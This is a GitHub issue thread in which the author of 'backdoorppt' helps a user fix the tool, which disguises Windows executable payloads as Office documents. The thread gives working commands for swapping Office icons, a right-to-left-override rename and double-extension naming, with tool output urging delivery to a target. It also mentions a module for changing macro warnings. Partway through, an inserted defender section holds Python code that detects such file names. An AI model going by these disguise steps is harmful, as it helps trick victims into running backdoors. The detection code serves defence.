Comments (24)

r00t-3xp10it commented on May 20, 2024

bug report: rename': No such file or directory


Do a check for me..

check if these exist:

backdoorppt/output/backdoor.exe
or
backdoorppt/output/backdoor_ppt.exe

If the files are not present then possible causes are:

1 - you did not enter the payload.exe binary to be transformed
    in the "PAYLOAD TO BE TRANSFORMED" zenity-box (full path location)
    and backdoorppt tool can not find the payload.exe to be transformed..
2 - 'PAYLOAD TO BE TRANSFORMED' is not a windows binary payload.exe

If the files are present then possible causes are:

1 - The 'Ruby interpreter' version is not compatible with the ruby command
      used by this tool "backdoorppt tool uses ruby 1.8.7 command syntax"

In that case: try using the 'BASH TRANSFORMATION' method instead

1º - edit 'settings' file and change the following line:

BASH_TRANSFORMATION=NO
change it to:
BASH_TRANSFORMATION=YES

2º - save 'settings' file and run backdoorppt again

from backdoorppt.

Falesco commented on May 20, 2024

Thanks for the reply, let me check:) brb

from backdoorppt.

r00t-3xp10it commented on May 20, 2024

not quite...
it means that your resourcehacker is not changing the payload icons...

Try to manually change the icons

replace $UpL by the full path of your payload to be transformed

wine /root/.wine/drive_c/"Program Files"/"Resource Hacker"/ResourceHacker.exe -open $UpL -save /root/Desktop/Tools/backdoorppt/output/backdoor.exe -action addskip -res /root/Desktop/Tools/backdoorppt/icons/Microsoft-Excel.ico -mask ICONGROUP,MAINICON,

NOTE: settings file must be edited before running backdoorppt.sh, right?

from backdoorppt.

r00t-3xp10it commented on May 20, 2024

well, I have just now tried the 4 different ways to build..
and everything works fine in my distro (kali rolling)...

it builds the 2 transformation methods (ruby or bash) using RH
and it builds the 2 transformation methods (ruby or bash) without using RH

from backdoorppt.

Falesco commented on May 20, 2024

yeah, no idea.. I'm running kali 2. Also, I will try to reinstall the GIT, maybe that will do something..

from backdoorppt.

r00t-3xp10it commented on May 20, 2024

the 2 above commands require a backdoor.exe
to be present in backdoorppt/output folder to be able to 'transform' the extensions..

in RUBY it requires:

backdoorppt/output/backdoor_ppt.exe
and then
ruby -e 'File.rename("backdoor_ppt.exe", "resume\xe2\x80\xaetpp.exe")'

in BASH it requires:

/root/backdoorppt/output/backdoor.exe
and then
mv backdoorppt/output/backdoor.exe  backdoorppt/output/NAME.ppt.exe > /dev/null 2>&1

from backdoorppt.

r00t-3xp10it commented on May 20, 2024

yap

from backdoorppt.

Falesco commented on May 20, 2024

okido:)

from backdoorppt.

Falesco commented on May 20, 2024

backdoorppt/output/ is empty..

When I run the script, it lets me choose a .exe File via a Dialog.
After that, I need to choose win7 settings for Wine.

Then it gives me this:

```
[⊶] Checking backend applications!
[☆] Ruby installation -> found!
[☆] Wine installation -> found!
[☆] Zenity installation-> found!
[☆] Xterm installation -> found!
[☆] Wine Program Files -> found!
[☆] Select [windows 7] from winecfg...

The ResourceHacker provided by backdoorppt tool
requires wine to be set to 'windows 7' version.

[☆] ResourceHacker.exe -> found!
[⊶] Working on backdoor agent!
[☆] Transforming backdoor agent -> done...
[☆] Change backdoor agent icons -> done...
[☆] Adding agent hidden extensions -> done...
[☆] Word doc builder (backdoorppt) -> done...
-e:1:in `rename': No such file or directory @ rb_file_s_rename - (backdoor_ppt.exe, resume‮tpp.exe) (Errno::ENOENT)
	from -e:1:in `<main>'
[⊶] Task over, Writing reports!

Icon select : Microsoft-Word-2016.ico
Final file  : /root/Desktop/Tools/backdoorppt/output/resumeexe.ppt
Tool Author : r00t-3xp10it (SSA RedTeam)

Your backdoor agent its now transformed into one fake
word doc (ppt) remmenber that .exe extensions will not
be 'visible' under windows systems, because the system
default behavior its: NOT show hidden extensions...

We are now ready to start a handler (listener) and
deliver the transformed agent to the target machine.
```

from backdoorppt.

r00t-3xp10it commented on May 20, 2024

edit 'settings' file and activate the BASH_TRANSFORMATION method..
BASH_TRANSFORMATION=YES

if it doesn't work, it means that your installed resourcehacker
is not doing its job of replacing payload icons ...

in that case edit 'settings' file and activate:
RESOURCEHACKER_BYPASS=YES

from backdoorppt.

Falesco commented on May 20, 2024

It looks like everything goes perfect, but still nothing in OUTPUT:

```
root@kalix:~/Desktop/Tools/backdoorppt# ./backdoorppt.sh

+-+-+-+-+-+-+-+-+-+-+-+-+---+
|b|a|c|k|d|o|o|r|p|p|t|:|1.5|
+-+-+-+-+-+-+-+-+-+-+-+-+---+
'Office spoof extensions tool'
Credits: Damon Mohammadbagher

[⊶] Checking backend applications!
[☆] Wine installation -> found!
[☆] Zenity installation-> found!
[☆] Xterm installation -> found!
[☆] Wine Program Files -> found!
[☆] Select [windows 7] from winecfg...

The ResourceHacker provided by backdoorppt tool
requires wine to be set to 'windows 7' version.

[☆] ResourceHacker.exe -> found!
[⊶] Working on backdoor agent!
[☆] Transforming backdoor agent -> done...
[☆] Change backdoor agent icons -> done...
[☆] Adding agent hidden extensions -> done...
[☆] Word doc builder (backdoorppt) -> done...
[⊶] Task over, Writing reports!

Icon select : Powerpoint-green.ico
Final file  : /root/Desktop/Tools/backdoorppt/output/testje.ppt.exe
Tool Author : r00t-3xp10it (SSA RedTeam)

Your backdoor agent its now transformed into one fake
word doc (ppt) remmenber that .exe extensions will not
be 'visible' under windows systems, because the system
default behavior its: NOT show hidden extensions...

We are now ready to start a handler (listener) and
deliver the transformed agent to the target machine.
```

from backdoorppt.

Falesco commented on May 20, 2024

After a reboot, it seems to be working now!

from backdoorppt.

r00t-3xp10it commented on May 20, 2024

are the 2 transformation methods working now?
what 'settings' are active in the backdoorppt/settings file?

from backdoorppt.

Falesco commented on May 20, 2024

Bypassing ResourceHacker..

from backdoorppt.

Falesco commented on May 20, 2024

I got the .ppt.exe now in OUTPUT

from backdoorppt.

Falesco commented on May 20, 2024

So that did the trick right?

from backdoorppt.

Falesco commented on May 20, 2024

yeah, of course.. But still nothing:)

from backdoorppt.

Falesco commented on May 20, 2024

any idea why I also don't get to choose the extension choice anymore? (doc, excl, etc)

from backdoorppt.

Falesco commented on May 20, 2024

btw.. is this the only "office spoof" tool u got? respect for this one of course!
But I was reading about a silent doc exploit? Even not macro, u got any info about it?

from backdoorppt.

r00t-3xp10it commented on May 20, 2024

ahhh you have some issue in your file system...
because backdoorppt.sh only uses backdoorexe.ppt or backdoor.ppt.exe extension methods

backdoorppt.sh uses the following commands to embed extensions (ruby method)
1 - mv ~/backdoorppt/output/backdoor.exe ~/backdoorppt/output/backdoor_ppt.exe > /dev/null 2>&1
2 - ruby -e 'File.rename("backdoor_ppt.exe", "resume\xe2\x80\xaetpp.exe")'

Those two commands will not interfere with the linux file system in any way...

about the silent doc exploit, I have written a post-exploitation msf module
to change the macro sandbox warning dialog, read it here: post-exploitation msf module

from backdoorppt.
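For defenders, an added example (not part of the thread or of backdoorppt's code) that flags the two name tricks produced by the rename commands quoted in the comments above: a right-to-left override character (the `\xe2\x80\xae` bytes) and a `.ppt.exe` double extension. The function names and the extension lists are assumptions of this example, and the sample names are constructed from the ones quoted in the thread.

```python
import unicodedata

# Bidi controls change how a name is drawn without changing its bytes.
BIDI_CONTROLS = set("\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069\u200e\u200f")
RLO = "\u202e"  # RIGHT-TO-LEFT OVERRIDE; UTF-8 bytes e2 80 ae, as in the ruby rename
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd"}          # assumed list
DOCUMENT_EXTS = {"ppt", "pptx", "doc", "docx", "xls", "xlsx", "pdf"}  # assumed list
# Constructed sample names; the first two follow the names quoted in this thread.
SAMPLE_NAMES = ["resume\u202etpp.exe", "testje.ppt.exe", "report.pptx", "setup.exe"]


def extension(name):
    """Lower-cased text after the last dot, or '' when there is no extension."""
    base, dot, ext = name.rpartition(".")
    return ext.lower() if dot and base else ""


def displayed_name(name):
    """Approximate what a bidi-aware file manager draws: text after the last RLO
    runs right to left. Simplified model, not the full Unicode bidi algorithm."""
    head, sep, tail = name.rpartition(RLO)
    shown = head + tail[::-1] if sep else name
    return "".join(c for c in shown if c not in BIDI_CONTROLS)


def inspect_filename(name):
    """Return the list of findings for one file name (str or raw bytes)."""
    if isinstance(name, bytes):
        name = name.decode("utf-8", errors="replace")
    findings = ["bidi-control U+%04X %s" % (ord(c), unicodedata.name(c))
                for c in sorted(set(name) & BIDI_CONTROLS)]
    real_ext = extension(name)  # what the operating system acts on
    if real_ext in EXECUTABLE_EXTS:
        shown_ext = extension(displayed_name(name))
        inner_ext = extension(name.rpartition(".")[0])
        if shown_ext in DOCUMENT_EXTS:
            findings.append("shown as .%s but is .%s" % (shown_ext, real_ext))
        if inner_ext in DOCUMENT_EXTS:
            findings.append("double extension .%s.%s" % (inner_ext, real_ext))
    return findings


def scan(names):
    """Map each flagged name to its findings; clean names are left out."""
    return {n: f for n in names if (f := inspect_filename(n))}


if __name__ == "__main__":
    for flagged, why in scan(SAMPLE_NAMES).items():
        print(ascii(flagged), why)
```

The same check can be run over attachment names at a mail gateway or over `os.listdir()` output during triage; the displayed form it computes for the first sample matches the "Final file" name in the tool report quoted earlier in the thread.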

Falesco commented on May 20, 2024

okido let me check:) Thanks man

from backdoorppt.

Falesco commented on May 20, 2024

```
root@kalix:~/Desktop/Tools/backdoorppt/output# ruby -e 'File.rename("backdoor_ppt.exe", "resume\xe2\x80\xaetpp.exe")'
-e:1:in `rename': No such file or directory @ rb_file_s_rename - (backdoor_ppt.exe, resume‮tpp.exe) (Errno::ENOENT)
	from -e:1:in `<main>'
```

from backdoorppt.

Falesco commented on May 20, 2024

ohh okay so choose the "backdoor" manually by placing it in the output folder

from backdoorppt.

r00t-3xp10it commented on May 20, 2024

Issue resolved .. resource hacker is working under wine 64 bits now ..

from backdoorppt.
